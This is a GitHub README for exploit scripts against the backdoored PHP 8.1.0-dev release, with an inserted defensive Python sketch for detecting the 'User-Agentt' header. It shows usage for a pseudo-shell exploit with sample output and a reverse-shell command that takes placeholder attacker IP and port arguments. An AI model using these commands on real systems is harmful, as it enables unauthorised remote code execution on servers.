flast101 / php-8.1.0-dev-backdoor-rce

PHP 8.1.0-dev Backdoor System Shell Script


PHP 8.1.0-dev Backdoor Remote Code Execution



PHP version 8.1.0-dev was released with a backdoor on March 28th, 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.

The original code was restored after the issue was discovered, but was then tampered with a second time. The breach would have created a backdoor in any website that ran the compromised version of PHP, enabling hackers to perform remote code execution on the site.
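For defenders, the misspelled header name is itself the indicator. The following detection sketch is an added example, not code from this repository: it scans captured raw HTTP requests for any header named User-Agentt. It assumes full request headers are available from a proxy, WAF or packet capture, since standard access logs do not record arbitrary header names; the function names and sample captures are constructed for illustration.

```python
SUSPECT_HEADER = "user-agentt"  # name from the page; HTTP header names are case-insensitive


def parse_request(raw):
    """Return (request_line, [(name, value), ...]) for one raw HTTP/1.x request."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]  # drop the body
    lines = head.split("\n")
    headers = []
    for line in lines[1:]:
        if line[:1] in (" ", "\t") and headers:  # obsolete folded continuation line
            name, value = headers[-1]
            headers[-1] = (name, f"{value} {line.strip()}")
            continue
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip(), value.strip()))
    return lines[0].strip(), headers


def find_suspect_requests(captures):
    """Return one finding per captured request that carries the suspect header."""
    findings = []
    for source, raw in captures:
        request_line, headers = parse_request(raw)
        values = [v for n, v in headers if n.lower() == SUSPECT_HEADER]
        if values:
            findings.append({"source": source, "request": request_line, "values": values})
    return findings


# Constructed sample captures (documentation IP ranges, placeholder header values).
SAMPLE_CAPTURES = [
    ("192.0.2.10", "GET /index.php HTTP/1.1\r\nHost: example.test\r\nUser-Agent: Mozilla/5.0\r\n\r\n"),
    ("198.51.100.7", "GET / HTTP/1.1\r\nHost: example.test\r\nUser-Agentt: constructed-value-1\r\n\r\n"),
    ("203.0.113.9", "POST /a.php HTTP/1.1\r\nHost: example.test\r\nuser-agentT: constructed-value-2\r\n\r\nx=1"),
    # The string appears only in the body here, so this request must not be flagged.
    ("192.0.2.44", "POST /b.php HTTP/1.1\r\nHost: example.test\r\n\r\nUser-Agentt: only in body"),
]

if __name__ == "__main__":
    for finding in find_suspect_requests(SAMPLE_CAPTURES):
        print(finding)
```

A legitimate client has no reason to send this header name, so any hit is worth triaging regardless of the header's value.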

Read full article: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/

POC Script

This short exploit script backdoor_php_8.1.0-dev.py uses the backdoor to provide a pseudo system shell on the host. Find it on Exploit DB.


└─$ python3 backdoor_php_8.1.0-dev.py
Enter the host url:

Interactive shell is opened on http://a.b.c.d 
Can't acces tty; job crontol turned off.
$ id
uid=1000(user) gid=1000(user) groups=1000(user)

Reverse Shell

This short exploit script revshell_php_8.1.0-dev.py gives a reverse shell on target.


└─$ python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>


Be Curious, Learning is Life ! 😃